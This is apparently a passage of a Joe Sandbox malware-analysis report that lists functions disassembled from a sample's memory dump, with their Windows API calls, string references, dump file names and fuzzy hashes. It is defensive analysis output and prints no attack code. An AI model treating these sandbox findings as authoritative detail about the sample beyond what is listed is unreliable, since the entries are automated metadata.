Function 00610574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0061057F

Strings

Ddi, xrefs: 005DA151
Ddi, xrefs: 005DA317

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClearVariant
String ID: Ddi$Ddi
API String ID: 1473721057-1196670030
Opcode ID: 2b1d9a74f01b9eb7d0e89175f5480d13b9c31405e9920189b4a484dcca25d715
Instruction ID: 28d711da259397db7af35cfebf8f392749856224e21f8a007c2fbfe442e1ace6
Opcode Fuzzy Hash: 2b1d9a74f01b9eb7d0e89175f5480d13b9c31405e9920189b4a484dcca25d715
Instruction Fuzzy Hash: D85103786083428FDB64CF19C584A1ABBF6BB99750F54881EF9858B361D371EC81CF82

Function 0064258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0064259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006425D4

Strings

|, xrefs: 006425A5

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: d4835b6205fd84bdca9e38606082da6a0c692fc3ae883c38028ec7378ad787e0
Instruction ID: 761df2302ccd9e28240b302358add28fbd5dcced5c1cfec70f5ccfe1a0c12018
Opcode Fuzzy Hash: d4835b6205fd84bdca9e38606082da6a0c692fc3ae883c38028ec7378ad787e0
Instruction Fuzzy Hash: 6631397180111AEBCF11EFA4CC89EEEBFB9FF08350F10005AF914A6262EB315956DB60

Function 00656A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00656B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00656B53

Strings

static, xrefs: 00656AB3

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: bb405b61cc93209232496f22b1a646b592801e01eb2c4b010924eac41549b270
Instruction ID: f96b4f766648026c995d4c56669bdf92fe956e3e349ff58efd9b4ee0b4405e05
Opcode Fuzzy Hash: bb405b61cc93209232496f22b1a646b592801e01eb2c4b010924eac41549b270
Instruction Fuzzy Hash: 7B319071200604AEDB109F68CC40BFB77AAFF48761F50951AFDA5D7290DA31AC95CB60

Function 006328A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00632911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0063294C

Strings

0, xrefs: 0063290A

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 58be9e66032a9354f4219b70c879898cdc7332f25d8f6753cce1f9e12d45afb7
Instruction ID: 89953c8e66ff88da069838416410392114400566fd98e4180aed2b05a47b2a80
Opcode Fuzzy Hash: 58be9e66032a9354f4219b70c879898cdc7332f25d8f6753cce1f9e12d45afb7
Instruction Fuzzy Hash: 8231E331A0030BDFEB25CF49C885BEEBBBAEF45350F141019E981A62E1D7709944CB91

Function 005D16DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

Part of subcall function 005D25DB: GetWindowLongW.USER32(?,000000EB), ref: 005D25EC

GetParent.USER32(?), ref: 0060B7BA
DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,005D19B3,?,?,?,00000006,?), ref: 0060B834

Strings

P[, xrefs: 005D172A, 0060B7D9, 0060B800

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: P[
API String ID: 2181805148-2517523118
Opcode ID: 7f0d8fc2367f519ddc075a066f782f47d09ac8225c3a135c2e22dc97675cdfd8
Instruction ID: 13fc102fe69658ff9a07c26ed26a33270a66767c753baf984c0f2297c82ecc85
Opcode Fuzzy Hash: 7f0d8fc2367f519ddc075a066f782f47d09ac8225c3a135c2e22dc97675cdfd8
Instruction Fuzzy Hash: 90215E34201514AFCB259F2CC988DAA3FA7FB4A320F548256F5265B3F2C7319D52DB54

Function 006566D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00656761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0065676C

Strings

Combobox, xrefs: 0065672E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 89f4f1e8eb5dd3e3b9d281c8de84ee49fd815d41c7f81e181308a9fe1ea8f687
Instruction ID: d170dde0a47df6437b8079583c1d0f2f4830415020a093e9102d0053cf93393c
Opcode Fuzzy Hash: 89f4f1e8eb5dd3e3b9d281c8de84ee49fd815d41c7f81e181308a9fe1ea8f687
Instruction Fuzzy Hash: C7116075200209AFEF259F54CC81EEB3B6BEB88369F514229F91497290D6719C55C7A0

Function 006596F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

P[, xrefs: 0065971B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID: P[
API String ID: 0-2517523118
Opcode ID: fb044610d4e3066a473b1c26dd4973f06d4ae678fa1d447b729936de14231b94
Instruction ID: 07477a24083db665409f03768747792b33dce13d27301a58beba214d9bfce454
Opcode Fuzzy Hash: fb044610d4e3066a473b1c26dd4973f06d4ae678fa1d447b729936de14231b94
Instruction Fuzzy Hash: 0B216D31124208EFDB108F54CC45FFA37AAEB09312F404156FE12DA2E0C671E9199B70

Function 00656C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 005D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005D1D73
Part of subcall function 005D1D35: GetStockObject.GDI32(00000011), ref: 005D1D87
Part of subcall function 005D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005D1D91

GetWindowRect.USER32(00000000,?), ref: 00656C71
GetSysColor.USER32(00000012), ref: 00656C8B

Strings

static, xrefs: 00656C4E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 77a1f6cee6d82deeb0f5d83216f13d0986bc9650259c7488b7f944fffe6c3a78
Instruction ID: 0e2a0ca850ac3f8881ef6d81de8580307597b0d7563f3cfc3c8c7f925170c1dc
Opcode Fuzzy Hash: 77a1f6cee6d82deeb0f5d83216f13d0986bc9650259c7488b7f944fffe6c3a78
Instruction Fuzzy Hash: 6521267261020AAFDF04DFA8CC45AFA7BAAFB08315F005629FD95D3250E735E855DB60

Function 0065678B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 006567AA
CreatePopupMenu.USER32 ref: 00656828

Strings

P[, xrefs: 00656802, 0065683D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CreateMenuPopup
String ID: P[
API String ID: 3826294624-2517523118
Opcode ID: 50dae07ae85689957952d34c3987219cb394c36a438aea2a71c91373ae8a11f2
Instruction ID: 9e0ea0bb64276a7ba1b9fe91a06fad692187a13329a60121b533cb3f43d4f2c2
Opcode Fuzzy Hash: 50dae07ae85689957952d34c3987219cb394c36a438aea2a71c91373ae8a11f2
Instruction Fuzzy Hash: 58214678500A099FDB21CF28D544BD67BE6FB0D325F84816AEC5A8B391C331AC4ACF61

Function 00656920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 006569A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006569B1

Strings

edit, xrefs: 00656986

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 98f0688f59ada27cff51cb81668d8e218171d3048c4df38ac4033a1f437150b0
Instruction ID: 6f7871fb3a0676bf3905a883c8a6c72c8e1f1ed9768f21b7f8724e6c4b6433b7
Opcode Fuzzy Hash: 98f0688f59ada27cff51cb81668d8e218171d3048c4df38ac4033a1f437150b0
Instruction Fuzzy Hash: 36116A7150020AABEB109F64DC44AEB3BABEB053B6F904728FDA5972E0C771DC59D760

Function 006329AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00632A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00632A41

Strings

0, xrefs: 00632A18

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 95cf4a9371b8ff30f3cedd439cf7df8d43bc9713536982bbc6abe028ff10a7c3
Instruction ID: 1c80d96af592a77ec8ac450409a93bb5a5ac620f20e59418bb68e102d1cebd4a
Opcode Fuzzy Hash: 95cf4a9371b8ff30f3cedd439cf7df8d43bc9713536982bbc6abe028ff10a7c3
Instruction Fuzzy Hash: 5411E232901226ABCF31DF98DC54BEA77BEAB45300F244022E895E73A0D730AD0AC7D1

Function 006421D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0064222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00642255

Strings

<local>, xrefs: 0064221D

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 3bdc4c806418172918f0a62e4c028b126942400634860dc80bc798ccd8d4719a
Instruction ID: 6167370bbde590abfb32d4415bfbdfdd7c0ab7b05c4754d67f407e20b1f63665
Opcode Fuzzy Hash: 3bdc4c806418172918f0a62e4c028b126942400634860dc80bc798ccd8d4719a
Instruction Fuzzy Hash: 46110670501226BADB248F118CA4FF7FBAAFF06351F60822AF60587100D2B05A81D6F0

Function 006584E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 00658530

Strings

P[, xrefs: 00658509

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend
String ID: P[
API String ID: 3850602802-2517523118
Opcode ID: 1f30049581605cce0e1959032c6c350952811413f09956c36026a6b211a9d33d
Instruction ID: 7bd1b0efd5c7db3ec730eaea4e0929e27a03f02d2125c4d33cf6956117ff5eec
Opcode Fuzzy Hash: 1f30049581605cce0e1959032c6c350952811413f09956c36026a6b211a9d33d
Instruction Fuzzy Hash: 4221E775600209EFCF55DF98D8408EA7BB6FB4D351F004155FD06A7360DA31AD65DB90

Function 005D2327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

P[, xrefs: 0060BF21, 0060BF47

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID: P[
API String ID: 0-2517523118
Opcode ID: 1dcbc556409afe0aa47c0933944b924e09183a96390ca516f0852f25a50f1902
Instruction ID: 59343e045e5911ae715fd1002b6fc42289193988a0ddd291f0c7148ac349a490
Opcode Fuzzy Hash: 1dcbc556409afe0aa47c0933944b924e09183a96390ca516f0852f25a50f1902
Instruction Fuzzy Hash: 02111634644605AFCB24DF28D840AA67BE6FB59320F14865AFA699B3E0C771A9418F90

Function 005E092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005D3C14,006952F8,?,?,?), ref: 005E096E

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

_wcscat.LIBCMT ref: 00614CB7

Strings

Si, xrefs: 005E09AE

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: Si
API String ID: 257928180-1103709175
Opcode ID: 34514d2400b07e902f614376a3f0085d978b07de5d9e3512dade55cb7a7da9f4
Instruction ID: 8fe603417d4df9b94cd293a964a003e0515e463505d5a46c8f045141ff36b1c5
Opcode Fuzzy Hash: 34514d2400b07e902f614376a3f0085d978b07de5d9e3512dade55cb7a7da9f4
Instruction Fuzzy Hash: BD11A5309052099BDB55FFA4C849EDD7BB9BF48350F0055A7B985D7282FAB096884B11

Function 00628E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 0062AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0062AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00628E73

Strings

ListBox, xrefs: 00628E3D
ComboBox, xrefs: 00628E12

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: f3496793a469e912d00448d2698fc538db9f571a9139ba8bb856a8474036d614
Instruction ID: 1acfb63458210c3d397911852232a1dccf0f8aa55ebe7a93de2ad5bf77a46152
Opcode Fuzzy Hash: f3496793a469e912d00448d2698fc538db9f571a9139ba8bb856a8474036d614
Instruction Fuzzy Hash: E301B5B160262AAB8B14FBA8DC558FE776ABF45360B14061AB871573E1EE315808CA50

Function 00628CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 0062AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0062AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00628D6B

Strings

ListBox, xrefs: 00628D35
ComboBox, xrefs: 00628D0A

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: dc83559eedda1a46a932e1f0a691c4928fab67570a02003e5048fd38b16e1b08
Instruction ID: 1741da66036e5fc68273208267790e24bef31a397d560ad9596c31bce6f6fc2b
Opcode Fuzzy Hash: dc83559eedda1a46a932e1f0a691c4928fab67570a02003e5048fd38b16e1b08
Instruction Fuzzy Hash: B801D4B1A4151AABCB24EBE4DD56EFE77AAAF15300F10042AB801672D1EE215E0CDA71

Function 00628D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Part of subcall function 0062AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0062AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00628DEE

Strings

ListBox, xrefs: 00628DBA
ComboBox, xrefs: 00628D8F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 8534104b5039d7a78ce955252e8779c8c1feccbce6a79164928fa9d0ee0abc40
Instruction ID: e4687d5969881eb1dbdbf45cf3138618c9cf7c17f5cdde6696de579e9fc40c58
Opcode Fuzzy Hash: 8534104b5039d7a78ce955252e8779c8c1feccbce6a79164928fa9d0ee0abc40
Instruction Fuzzy Hash: FC01F7B1A4151AABCB20F7A8DD56EFE77AAAF25300F104416B80163392EE214E0CD671

Function 0062C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0062C534

Part of subcall function 0062C816: _memmove.LIBCMT ref: 0062C860
Part of subcall function 0062C816: VariantInit.OLEAUT32(00000000), ref: 0062C882
Part of subcall function 0062C816: VariantCopy.OLEAUT32(00000000,?), ref: 0062C88C

VariantClear.OLEAUT32(?), ref: 0062C556

Strings

d}h, xrefs: 0062C517

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}h
API String ID: 2932060187-1768379455
